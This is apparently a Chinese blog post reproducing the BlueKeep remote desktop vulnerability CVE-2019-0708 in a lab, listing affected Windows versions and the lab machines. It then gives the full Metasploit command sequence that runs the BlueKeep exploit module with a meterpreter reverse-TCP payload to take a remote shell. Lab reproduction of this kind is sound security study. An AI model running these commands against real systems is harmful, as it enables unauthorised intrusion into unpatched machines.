CVE-2019-0708远程桌面代码执行漏洞复现

发布于 2019-11-28  971 次阅读


0x01 简介

2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。

0x02 影响系统

  • Windows 7 SP1 x64
  • Windows 2008 R2 x64

0x03 利用端口

  • 端口: 3389

0x04 实验环境

  • 靶 机:Windows 7 sp1 x64
    • IP:172.17.2.26
  • 攻击机:Kali
    • IP:172.17.2.6

0x05 使用命令

msfconsole 
search cve-2019-0708  
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  
show options  
set rhosts 172.17.2.26  
show targets 
set targets 2 
show payloads 
set payload windows/x64/meterpreter/reverse_tcp 
run 

0x06 视频演示


我不懂世界到底在热闹些什么